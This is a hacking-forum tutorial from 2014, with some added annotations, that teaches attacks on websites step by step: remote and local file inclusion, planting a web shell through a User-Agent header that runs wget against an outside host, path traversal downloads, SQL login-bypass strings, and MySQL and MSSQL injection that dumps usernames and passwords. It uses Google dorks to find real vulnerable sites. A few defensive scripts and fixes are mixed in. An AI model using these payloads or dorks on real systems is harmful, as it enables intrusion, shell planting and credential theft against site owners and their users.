02-12-2014 07:58 AM HQ Guide - Web-Hacking Methods Tutorial
Hello Hackers!

This is a tutorial about web-hacking methods that I and many other hackers have collected.
I thought that many people would learn a lot from it.
Guide content:

[I] Remote file inclusion
[1] RFI?
[2] Vulnerable script
[3] Exploiting the vulnerability
[4] Null byte bypass
[5] Protection script

[II] Local file inclusion
[1] LFI?
[2] Finding vulnerable sites
[3] Checking site vulnerability
[4] /proc/self/environ
[5] Shell uploading

[III] Local file download
[1] LFD?
[2] Vulnerable script
[3] Vulnerability check
[4] Exploiting the vulnerability
[5] Protection script

[IV] Full path disclosure

[V] SQL Injection - login bypass
[1] Dorks
[2] Login

[VI] SQL Injection (MySQL) and load_file()
[1] SQL Injection?
[2] Finding vulnerable sites
[3] Site vulnerability check
[4] Finding number of columns
[5] Finding vulnerable columns
[6] Finding database version
[7] Finding table names
[8] Finding column names
[9] Taking data from columns
[10] Filter bypassing
[11] Site protection from SQL Injection

[VII] MSSQL Injection
[1] Finding number of columns
[2] Finding database version
[3] Finding table name
[4] Finding column name
[5] Taking data from columns

[VIII] Blind SQL Injection
[1] Blind SQL Injection?
[2] Site vulnerability check
[3] Finding database version
[4] MySQL user
[5] Finding table name
[6] Finding column name
[7] Taking data from columns
[8] Taking data from columns using sqlmap

[IX] PostgreSQL Injection
[1] PostgreSQL Injection?
[2] Finding vulnerable sites
[3] Site vulnerability check
[4] Finding number of columns
[5] Finding vulnerable columns
[6] Finding database version
[7] Finding table name
[8] Finding column name
[9] Taking data from columns

[X] Error based PostgreSQL Injection
[1] Error based PostgreSQL Injection?
[2] Finding vulnerable sites
[3] Site vulnerability check
[4] Finding database version
[5] Finding table name
[6] Finding column name
[7] Taking data from columns

[XI] SQL Injection on ASPX
[1] Site vulnerability check
[2] Finding table name
[3] Finding column name
[4] Finding columns in admin table
[5] Finding username and password

[XII] Dot net nuke

[XIII] XSS
[1] XSS?
[2] Required stuff
[3] XSS types
[4] Testing XSS vulnerability
[5] Cookie stealing
[6] Filter bypassing

[XIV] CRLF
[1] CRLF?
[2] Vulnerable places
[3] Exploiting the vulnerability and protection
[4] Vulnerable script

[XV] CSRF
[1] CSRF?
[2] Vulnerable places
[3] Exploiting the vulnerability

[XVI] Server Side Includes | Server Side Inclusion
[1] Introduction to Server Side Includes
[2] Creating SSI
[3] Server Side Inclusion


END

So let's get started!
[I] Remote file inclusion

1) RFI?
RFI (Remote File Inclusion) is a web vulnerability in PHP scripts that pass a GET parameter straight into include() (or require(), include_once(), require_once()). If the value is a URL, PHP fetches the remote file and executes it as PHP. The payload is usually hosted as a .txt file, so the attacker's own server sends the source instead of running it.
Example:

http://www.site.com/index.php?page=home

RFI is rare nowadays: remote inclusion only works when the php.ini setting allow_url_include is On, and it has been Off by default since PHP 5.2. Where it is on, all you need is a shell in .txt format on a server you control.

2) Vulnerable script

<?php
// The page name comes straight from the query string and is included as-is.
$page = $_GET['page'];
include($page);
?>
3) Exploiting the vulnerability
We have the site:

http://www.site.com/index.php?page=home

Instead of home we pass the URL of our shell. Note the scheme: without http:// PHP looks for a local file named www.shell-link.com/shell.txt instead of fetching it.

http://www.site.com/index.php?page=http://www.shell-link.com/shell.txt?

The trailing ? turns anything the script appends to the parameter into a query string for the attacker's server, so shell.txt is still what gets fetched. If the site is vulnerable, the shell appears with a file listing of the site you are attacking.
4) Null byte bypass
Some scripts have a weak protection that appends an extension (.html or something else) to the included file:

<?php
$page = $_GET['page'];
include($page.".html");
?>

In that case we use the null byte bypass (%00). In PHP before 5.3.4 a null byte terminated the path string, so everything after %00 was ignored. PHP 5.3.4 and later reject paths that contain a null byte, so this only works against old installations. The same trick was used to upload a PHP file disguised as a picture (shell.php%00.jpg), but that is not covered here.

So the link looks like this:

http://www.site.com/index.php?page=http://www.shell-link.com/shell.txt?%00

For a remote URL the trailing ? already neutralises the appended suffix; %00 matters when the same script is abused for local inclusion.
5) Protection script
The script looks like this:

<?php
$page = $_GET['page'];
include($page);
?>

So we add a check before the include (the original post omitted the closing parenthesis and included $page instead of the checked path; both are fixed here):

<?php
$page = $_GET['page'];
// Only include files that exist under pages/. A value such as
// ../../../../etc/passwd still passes file_exists(), so this blocks remote
// URLs but not directory traversal. Use an allowlist of page names, or
// compare realpath() against the pages/ directory, for a real fix.
if(file_exists("pages/".$page)) {
    include("pages/".$page);
}
?>

[II] Local file inclusion

1) LFI?
LFI (Local File Inclusion) is the same include() bug used to read, or execute, files that are already on the server. It can be used on sites like:

http://link.com/index.php?page=

by adding

../../../../../../etc/passwd

(sometimes you have to add %00 after passwd, when the script appends an extension; see the null byte note above).
2) Finding vulnerable sites:
Typical parameter patterns to search for (Google dorks):

index.php?page=
index.php?option=
search.php?word=
3) Checking site vulnerability:
Find a site and use

../../../../../../../../../../../etc/passwd

or

../../../../../../../../../../../etc/passwd%00

Extra ../ segments are harmless: once the path reaches / they are ignored, so a long chain works no matter how deep the script lives. When you put this in the link you get something like:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:103::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
ntp:x:103:106::/home/ntp:/bin/false
snmp:x:104:65534::/var/lib/snmp:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin

which means that the site is vulnerable.
4) /proc/self/environ

Now we want to see whether /proc/self/environ can be included through the site, so that we can upload a shell.

Instead of etc/passwd%00 we put /proc/self/environ

If the page prints something like this:

DOCUMENT_ROOT=/home/sirgod/public_html
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac
HTTP_HOST=www.website.com
HTTP_REFERER=http://www.website.com/etc/passwd
HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00
PATH=/bin:/usr/bin
QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200
REMOTE_ADDR=6x.1xx.4x.1xx
REMOTE_PORT=35665
REQUEST_METHOD=GET
REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/sirgod/public_html/index.php
SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x
SERVER_ADMIN=webmaster**website.com
SERVER_NAME=www.website.com
SERVER_PORT=80
SERVER_PROTOCOL=HTTP/1.0
SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Serv..........

then /proc/self/environ is readable and we can upload the shell. /proc/self/environ holds the environment of the process that reads it. When PHP runs as a CGI or FastCGI process (note GATEWAY_INTERFACE=CGI/1.1 in the dump), the request headers are copied into that environment as HTTP_USER_AGENT, HTTP_REFERER and so on, so whatever you send in a header gets included and executed as PHP. Under mod_php the file usually holds only Apache's startup environment, and on many servers it is not readable by the web user at all.
5) Shell uploading

To upload the shell we need Mozilla Firefox:

http://www.mozilla.com/firefox/

and the add-on Tamper Data (any tool that lets you edit request headers, such as an intercepting proxy or curl -A, works the same way):

https://addons.mozilla.org/en-US/firefox/addon/tamper-data/

Open the site, e.g.:

http://www.site.com/index.php?lien=../../../../../../../../../../../../proc/self/environ

Tools > Tamper Data
Click Start Tamper, refresh the page, and in the User-Agent field put:

<?php system('wget http://www.link.com/shell.txt -O shell.php'); ?>

(The original post used the short <? tag, which only works when short_open_tag is enabled; <?php always works. www.link.com is your own host serving the shell source.) Click OK. wget writes shell.php into the working directory of the PHP process, normally the document root of the attacked site, so the shell is reached at:

http://www.site.com/shell.php

Any header that shows up in the environ dump (Referer, Cookie) works just like User-Agent.

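The /proc/self/environ technique above leaves a very recognisable trace in the web server's access log: a traversal sequence in the URL, a request for /etc/passwd or /proc/self/environ, and a PHP tag or a download command in the User-Agent or Referer header. The following detection script is an added example written for this page (not code from the original post): it parses Apache combined-format lines and tags the suspicious ones. The log lines, IP addresses and tag names are constructed for the illustration; Python is used so the example runs offline.

```python
import re
from urllib.parse import unquote

# Constructed Apache "combined" log lines for illustration, not from a real
# server. Line 2 is the /etc/passwd probe, line 3 the /proc/self/environ
# request carrying the wget payload in the User-Agent, line 4 the first hit
# on the dropped shell.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Feb/2014:07:58:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Feb/2014:07:58:09 +0000] "GET /index.php?page=../../../../../../etc/passwd%00 HTTP/1.1" 200 1811 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Feb/2014:07:58:15 +0000] "GET /index.php?page=..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 2930 "-" "<?php system('wget http://www.link.com/shell.txt -O shell.php'); ?>"
198.51.100.7 - - [12/Feb/2014:08:01:00 +0000] "GET /shell.php HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# Each rule is (tag, predicate over the percent-decoded URL or header value).
URL_RULES = [
    ("traversal", lambda s: "../" in s or "..\\" in s),
    ("null-byte", lambda s: "\x00" in s),
    ("etc-passwd", lambda s: "/etc/passwd" in s),
    ("proc-self-environ", lambda s: "/proc/self/environ" in s),
]
HEADER_RULES = [
    ("php-tag-in-header", lambda s: "<?" in s),
    ("download-command-in-header",
     lambda s: re.search(r"\b(wget|curl)\b", s) is not None),
]


def decode(value):
    """Decode twice so ..%252F (double-encoded) is caught as well as ..%2F."""
    return unquote(unquote(value))


def scan_log(text):
    """Return (ip, raw_url, tags) for every line that trips at least one rule."""
    findings = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue                      # not a combined-format line
        url = decode(m.group("url"))
        tags = [tag for tag, test in URL_RULES if test(url)]
        for header in (m.group("ua"), m.group("referer")):
            tags += [tag for tag, test in HEADER_RULES if test(decode(header))]
        if tags:
            findings.append((m.group("ip"), m.group("url"), tags))
    return findings
```

Requests that trip a rule and still get a 200 are the ones to chase; the later hit on shell.php from a second address (line 4) is what the follow-up looks like once the drop succeeded, so correlate new .php files under the document root with earlier findings from the same source.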
[III] Local file download

1) LFD?
LFD (Local File Download) is a vulnerability in scripts that serve files for download under a name taken from the request, normally a GET parameter; when the script reads it from POST you can still edit the request with Tamper Data.

http://site.com/download_file.php?file=notepad.exe
2) Vulnerable script

<?php
if(isset($_POST['download'])) {
// The file name comes from the request and goes to readfile() unchecked.
$file = $_GET['file'];
$file_info = pathinfo($file);
header('Content-type: application/x-'.$file_info['extension']);
header('Content-Disposition: attachment; filename='.$file_info['basename']);
header('Content-Length: '.filesize($file));
readfile($file);
exit;
}
?>
3) Vulnerability check

To check whether the script is vulnerable we try to download /etc/passwd.
So instead of:

http://site.com/download_file.php?file=notepad.exe

we use:

http://site.com/download_file.php?file=../../../../../../../../../etc/passwd

If a download starts and the file, opened in a text editor, looks something like this:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin

the script is vulnerable!
NOTE: On a Windows server use boot.ini instead of /etc/passwd (it exists on Windows XP / Server 2003 and older; on newer versions try C:\Windows\win.ini).
4) Exploiting the vulnerability

Now that we know the script is vulnerable, we want to see which files are on the host. One way (the original post had a typo, filel, in the parameter name):

http://site.com/download_file.php?file=../

../ moves one directory up and tries to download that directory.

1.1 The downloaded "file", opened in a text editor, lists the contents of the directory.
1.2 Or the download works, but the file is empty.

In case 1.1 we do not have to guess names and can download whatever we want.
In case 1.2 we have to guess file and directory names and can only download files whose names we guess. In practice readfile() does not return a directory listing on Linux (the read fails), so expect case 1.2. Tools that help find files include Acunetix and HTTrack Website Copier, and a Full Path Disclosure (next section) tells you where the application lives.
5) Protection script

We have the script from the start:

<?php
if(isset($_POST['download'])) {
$file = $_GET['file'];
$file_info = pathinfo($file);
header('Content-type: application/x-'.$file_info['extension']);
header('Content-Disposition: attachment; filename='.$file_info['basename']);
header('Content-Length: '.filesize($file));
readfile($file);
exit;
}
?>

The original post suggested wrapping the headers in if(file_exists("download/".$file)). On its own that does not help: the check and the read must use the same path, and ../../etc/passwd still satisfies file_exists() when it is prefixed with download/. Reduce the name to a plain file name with basename() and read only from download/ (the closing brace and ?> were missing in the original and are added here):

<?php
if(isset($_POST['download'])) {
// basename() strips any directory part, so ../../etc/passwd becomes passwd,
// which is then looked up only inside download/.
$file = basename($_GET['file']);
$path = "download/".$file;
$file_info = pathinfo($path);
if(file_exists($path)) {
header('Content-type: application/x-'.$file_info['extension']);
header('Content-Disposition: attachment; filename='.$file_info['basename']);
header('Content-Length: '.filesize($path));
readfile($path);
exit;
}
}
?>

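Both protection scripts in this guide (the include() fix in [I] 5 and the download fix above) come down to the same question: does the user-supplied name still point inside the directory it is supposed to? The following is an added example, not code from the original post, showing the two safe patterns in Python so it can be run offline: a strict allowlist for the include case, where only a handful of page names ever make sense, and lexical path containment for the download case. The web root, directory names and page list are assumptions for the illustration.

```python
import os
import re

# Constructed layout: a web root with a pages/ and a download/ directory.
# WEB_ROOT, PAGES_DIR, DOWNLOAD_DIR and ALLOWED_PAGES are assumptions for
# this illustration, not identifiers from the tutorial.
WEB_ROOT = "/var/www/app"
PAGES_DIR = os.path.join(WEB_ROOT, "pages")
DOWNLOAD_DIR = os.path.join(WEB_ROOT, "download")
ALLOWED_PAGES = {"home", "about", "contact"}

# A plain file name: no leading dot (so no ".." and no dotfiles), no slashes.
_SAFE_NAME = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_.-]*$")


def resolve_inside(base_dir, user_path):
    """Return the absolute path of user_path under base_dir, or None if it escapes.

    The check is lexical (os.path.normpath), so ../ chains, absolute paths and
    null bytes are rejected before any file is touched. On a real server also
    apply os.path.realpath, so a symlink inside base_dir cannot point outside.
    """
    if "\x00" in user_path:                 # the %00 extension bypass
        return None
    base = os.path.normpath(base_dir)
    # os.path.join discards `base` when user_path is absolute, so the prefix
    # test below also rejects "/etc/passwd".
    candidate = os.path.normpath(os.path.join(base, user_path))
    if candidate != base and not candidate.startswith(base + os.sep):
        return None
    return candidate


def page_to_include(page):
    """include() case: only names on the allowlist are ever turned into a path."""
    if page not in ALLOWED_PAGES:
        return None
    return os.path.join(PAGES_DIR, page + ".php")


def file_to_download(name):
    """download case: a plain file name that must resolve inside DOWNLOAD_DIR."""
    if not _SAFE_NAME.match(name):
        return None
    return resolve_inside(DOWNLOAD_DIR, name)
```

The allowlist is the better choice whenever the set of valid values is known in advance; path containment is for the cases where users genuinely pick arbitrary file names, and even then it should run after the name has been reduced to a basename.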
[IV] Full path disclosure

Full Path Disclosure (FPD) makes the application show an error message containing the absolute path of a script on the server (e.g. /home/insekure/public_html/index.php). You cannot hack a site with it directly, but it tells you where files and directories live, which is exactly what you need for LFI, for load_file() and for guessing names when a directory has been renamed.

There are many ways to trigger an FPD; the two most common are:

1st, over an array. Take a link like:

index.php?page=home

and add [] to the parameter, which turns $_GET['page'] into an array that the script cannot use as a file name:

index.php?page[]=home

That gives an error like this one:

Warning: include(blah/errors.php) [function.include]: failed to open stream: No such file or directory in /home/insekure/public_html/index.php on line 211

From this you can see the script's full path, and that the directory blah exists on the site.

2nd, over the session cookie (the "null session cookie"): set PHPSESSID to an empty value with JavaScript from the address bar, and session_start() complains.

This is the JavaScript:

javascript:void(document.cookie='PHPSESSID=');

Put that in the address bar, hit Enter and reload the page; you get this error:

Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /home/example/public_html/thems/errors.php on line 58

Then try to open the directory thems on the site; if directory listing is enabled you get a file list, otherwise you at least know the path. Current browsers refuse javascript: URLs typed into the address bar, so set the cookie through the developer tools or a proxy instead.

Protection:
The simplest protection is to stop showing errors to visitors. Set display_errors = Off in php.ini (keep log_errors = On so you still see them in the log), or, at script level, add:

error_reporting(0);

The latter also hides the errors from your own logs, so prefer the php.ini setting.
[V] SQL Injection - login bypass

(The original post called this section MySQL Injection, but the dorks below find classic ASP login pages, which usually sit on MSSQL or Access; the trick is the same on any database.)

1) Dorks

inurl:admin.asp
inurl:login/admin.asp
inurl:admin/login.asp
inurl:adminlogin.asp
inurl:adminhome.asp
inurl:admin_login.asp
inurl:administrator_login.asp

I am going to use:

http://site.com/Admin_Login.asp

2) Login

Find a site with these dorks and try to log in with:
Username: Admin
Password: password' or 1=1--

Instead of password' or 1=1-- you can use one of these:

'or'1'='1
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
'or'1=1'

The quote closes the string the script built around your input, or 1=1 makes the WHERE clause true for every row, and -- comments out the rest of the query. MSSQL understands --; MySQL understands -- (followed by a space) and #; the quote-balanced payloads such as ' or '1'='1 need no comment at all and work everywhere. The query therefore matches the first user in the table, usually the administrator, and the script logs you in.
If you are able to log in, the site is vulnerable and you have the admin panel.

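What the payload does to the query is easier to see with the query built and executed, so here is an added example (not code from the original post) of a login check written the way these ASP pages were, next to the same check with bound parameters. The table, its rows and the level names are constructed for the illustration; sqlite3 stands in for the site's database so it runs offline, and its -- comment behaves like the one on MSSQL and MySQL.

```python
import sqlite3

# Constructed in-memory database standing in for the login page's user table.
# Table and column names, and the rows, are assumptions for this illustration.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE admin (username TEXT, password TEXT, level TEXT)")
conn.executemany("INSERT INTO admin VALUES (?, ?, ?)",
                 [("Admin", "s3cret", "administrator"), ("bob", "hunter2", "user")])


def build_login_query(username, password):
    """What a string-concatenating login script sends to the database."""
    return ("SELECT level FROM admin WHERE username='" + username +
            "' AND password='" + password + "'")


def login_vulnerable(username, password):
    """Runs build_login_query() as-is and returns the level of the first
    matching row, or None. With password' or 1=1-- the WHERE clause becomes
    username='Admin' AND password='password' or 1=1 (the trailing quote is
    commented out), which is true for every row, so the first row wins."""
    row = conn.execute(build_login_query(username, password)).fetchone()
    return row[0] if row else None


def login_safe(username, password):
    """Same query with bound parameters: the quote and the comment are sent as
    data, not as SQL, so the payload simply matches no row."""
    row = conn.execute(
        "SELECT level FROM admin WHERE username=? AND password=?",
        (username, password)).fetchone()
    return row[0] if row else None
```

Note that login_vulnerable() returns the first row regardless of the username typed, which is why any of the quote-balanced payloads in the list above work even with a made-up user name.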
[VI] SQL Injection (MySQL)

1) SQL Injection?
SQL Injection is a web attack in which the attacker uses a hole in the script (a parameter glued into a query) to read all the data in the database. Vulnerable sites are in the format:

http://www.link.com/index.php?id=

Any script name can appear instead of index.

2) Finding vulnerable sites:
The easiest way to find vulnerable sites is Google. We use dorks like these:

inurl:faq.php?id=
inurl:event.php?id=
inurl:index.php?id=
3) Site vulnerability check:
There are 2 ways to check whether a site is vulnerable.

1st way, we have the link:

http://site.com/book.php?id=141

and add only ' at the end, so we get:

http://site.com/book.php?id=141'

2nd way, the same link:

http://site.com/book.php?id=141

and add +and+1=2-- at the end (+ is a space in the URL), so we get:

http://site.com/book.php?id=141+and+1=2--

If some part of the page disappears (a picture, text or something) or you get an error like "You have an error in your SQL syntax", the site is vulnerable. The second test is the more reliable one: a quote may simply be escaped, while and 1=2 only changes the page when the value reaches the query unquoted.
4) Finding number of columns
We use ORDER BY, which errors when its position number is larger than the number of columns in the query. On the link:

http://site.com/book.php?id=141

we add +order+by+5--

http://site.com/book.php?id=141+order+by+5--

If the page opens normally there are at least 5 columns. Let's try 10.

http://site.com/book.php?id=141+order+by+10--

Now part of the page disappeared, so there are at least 5 and fewer than 10 columns. Let's try 7.

http://site.com/book.php?id=141+order+by+7--

The page opens normally, so there are at least 7 and fewer than 10. Let's try 8 (the original post repeated 7 here by mistake).

http://site.com/book.php?id=141+order+by+8--

With 8 part of the page disappears, so the query has exactly 7 columns. This is a binary search: halve the interval each time and a few requests are enough.
5) Finding vulnerable columns

Now we append UNION SELECT ALL with one number per column. The id is negated (-141) so the original query returns no row and the page renders the UNION row instead:

http://site.com/book.php?id=-141+union+select+all+1,2,3,4,5,6,7--

The page now prints the numbers of the columns it displays (in this case 1 2 3 4 5 6 7), and data can be taken through any of them. We take the second column.
6) Finding database version

As said, we take data from the second column. Instead of the number 2 we put version() or @@version:

http://site.com/book.php?id=-141+union+select+all+1,@@version,3,4,5,6,7--

Where the 2 was, the page now shows the database version.
If the version is 4.x, information_schema does not exist (it was added in MySQL 5.0), so table and column names have to be guessed. With 5.x and later we can read them from information_schema.

We have version 5.0.51a-24+lenny5, so we do not have to guess.
7) Finding table names

With version 4 you cannot list tables and columns; you have to guess their names. With version 5 skip the guessing.
Some likely table names:

admin
admins
user
users
member
members

Some likely column names:

username
uname
un
user
name
nick
password
pw
pwd
passwd

With version 5 we read the table names like this: instead of the number 2 we put group_concat(table_name), and after the last column number we add +from+information_schema.tables+where+table_schema=database()-- (database() restricts the list to the current database; group_concat() joins all names into one string so a single request is enough).

So we get this link:

http://site.com/book.php?id=-141+union+select+all+1,group_concat(table_name),3,4,5,6,7+from+information_schema.tables+where+table_schema=database()--

Instead of the 2 the page shows the table names, in this case date, book, users. We take the columns of the users table.
8) Finding column names

We have the table we want; now we need its columns. Instead of group_concat(table_name) we put group_concat(column_name), and instead of +from+information_schema.tables+where+table_schema=database()-- we put +from+information_schema.columns+where+table_name=hex--, where hex is the table name written as a hex literal, so that no quotes are needed in the URL.

Go to:

http://www.string-functions.com/string-hex.aspx

write the table name (in this case users) and you get 7573657273; prefix it with 0x and we can see the columns:

http://site.com/book.php?id=-141+union+select+all+1,group_concat(column_name),3,4,5,6,7+from+information_schema.columns+where+table_name=0x7573657273--
9) Taking data from columns

We got: id, name, surname, username, password, level.
We need only username and password.

Instead of group_concat(column_name) we put group_concat(username,0x3a,password); 0x3a is the colon, used as a separator between user and password. Instead of +from+information_schema.columns+where+table_name=0x7573657273-- we put +from+users--

and we have the link:

http://site.com/book.php?id=-141+union+select+all+1,group_concat(username,0x3a,password),3,4,5,6,7+from+users--

and a result such as:

sebrezovski:1533562
seratum:seratum
coach:53.21.1985.
biga:biga

which are the users and passwords of this site. (group_concat() output is capped by group_concat_max_len, 1024 bytes by default, so on large tables fetch rows with LIMIT instead.)
10) Filter bypassing

If union+select+all is blocked ("not acceptable" or similar), try mixed case: UnIoN+sElEcT+aLl (this only beats case-sensitive keyword filters).
If spaces are filtered, use + (a URL-encoded space) or /**/ (a SQL comment, which MySQL treats as whitespace).
If version() is filtered, use unhex(hex(version())), or @@version.
11) Site protection from SQL Injection

The original post suggests adding this check to the script:

if(!is_numeric($_GET['id']))
{
echo 'Invalid id';
}

It rejects anything that is not numeric, so ' and and+1=2 never reach the query. Two caveats: the script must stop (die() or exit) after the message instead of running the query anyway, and is_numeric() also accepts values such as "1e3" and " 1". Casting with (int)$_GET['id'] is stricter, and prepared statements (PDO or mysqli with bound parameters) are the real fix, because they cover string parameters as well.
SQL Injection - load_file()

Once you have a site with a SQL injection you can try to read the mysql.user table and check for the FILE privilege.

To see which user we are and whether we can read mysql.user, we put user in the vulnerable column and add +from+mysql.user-- at the end of the URL.

It looks like this:

http://www.site.com/index.php?id=1+union+select+all+1,2,user,4+from+mysql.user--

If you get usernames back, you can read mysql.user and can continue. (Reading mysql.user needs the SELECT privilege on the mysql database, which web applications rarely have; user() or current_user() in the vulnerable column tells you who you are in any case.)

To see whether we have file privileges we put concat(user,0x3a,file_priv) instead of user, again with +from+mysql.user--

The page now lists usernames with their file privilege. Find the user you got in the first step; if Y (Yes) is shown next to it, you have the FILE privilege.

Load file:

All we do is write load_file('FILE NAME') in the vulnerable column.
We try /etc/passwd, so we put load_file('/etc/passwd') in the vulnerable column.

Which looks like this:

http://www.site.com/index.php?id=1+union+select+all+1,2,load_file('/etc/passwd'),4--

If that gives an error (quotes filtered, or escaped by magic_quotes), write the file name as a hex or char() literal, without the quotes.

Hex example:
Convert the file name to hex and prefix it with 0x:

http://www.site.com/index.php?id=1+union+select+all+1,2,load_file(0x2f6574632f706173737764),4+from+mysql.user--

The hex 2f6574632f706173737764 is '/etc/passwd'. (The +from+mysql.user-- is not needed for load_file(); it was kept from the earlier query.)

A hex converter:

www.string-functions.com/string-hex.aspx

With char() you write load_file(char(converted file name)):

http://www.site.com/index.php?id=1+union+select+all+1,2,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),4--

where 47,101,116,99,47,112,97,115,115,119,100 is '/etc/passwd' (the original post was missing a closing parenthesis here).

Char converter:

http://pookey.co.uk/binary.php

load_file() returns NULL rather than an error when the file does not exist, is not readable by the mysqld user, or lies outside secure_file_priv, so an empty column does not mean the injection failed.
[VII] MSSQL Injection

1) Finding number of columns

I will use:

http://www.site.com/sr/page/member.asp?id=234

To find the column count we again use ORDER BY. We add +order+by+5-- at the end of the link.

http://www.site.com/sr/page/member.asp?id=234+order+by+5--

MSSQL (with ASP error pages switched on) answers with this error:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]The ORDER BY position number 5 is out of range of the number of items in the select list.

/sr/page/member.asp, line 38

which means there are fewer than 5 columns, so we try 4. Same error, so we try 3 and get a different error:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'order'.

/sr/page/member.asp, line 44

The "out of range" error is gone (the new one is raised by a different line of the script, 44 instead of 38, i.e. by a second query), so the query has 3 columns.
2) Finding database version

To find the database version we use @@version:

http://www.site.com/sr/page/member.asp?id=-234+union+select+all+1,@@version,3--

and we get:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.2 (Build 3790: Service Pack 2) ' to a column of data type int.

/sr/page/member.asp, line 38

The second column of the original query is an integer, so MSSQL fails to convert our string to int and prints the string inside the error. This is error-based extraction: every value we select into that column comes back in such an error, and the rest of this section relies on it.
3) Finding table name

With this error-based MSSQL injection each error shows a single value, so tables come out one at a time.

http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,table_name,3+from+information_schema.tables--

and we get:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Country' to a column of data type int.

/sr/page/member.asp, line 38

so there is a table called 'Country'.

To get the next table we exclude the ones we already know with NOT IN. The link becomes:

http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,table_name,3+from+information_schema.tables+where+table_name+not+in('Country')--

and we get:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Admin' to a column of data type int.

/sr/page/member.asp, line 38

so there is an Admin table. Repeat, adding each new name to the NOT IN list, until no error comes back.
4) Finding column name

The same goes for columns: one per request, so we walk them one by one. This time we filter with where+table_name='Admin'--. The link is:

http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,column_name,3+from+information_schema.columns+where+table_name='Admin'--

and we get the error:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'USERNAME' to a column of data type int.

/sr/page/member.asp, line 38

so there is a column USERNAME. For the remaining columns we again use NOT IN:

http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,column_name,3+from+information_schema.columns+where+table_name='Admin'+and+column_name+not+in('USERNAME')--

and we get:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'PASSWD' to a column of data type int.

/sr/page/member.asp, line 38

So the other column is PASSWD.
5) Taking data from columns

Now we put the column name where table_name was, and the table name after from:

http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,USERNAME,3+from+Admin--

We get the username OjuZwqAul.

The same for the password:

http://www.site.com/sr/page/member.asp?id=234+union+select+all+1,PASSWD,3+from+Admin--

We get the password M7sWt2!2uq. With several rows in the table, use NOT IN on USERNAME as above to walk through them.

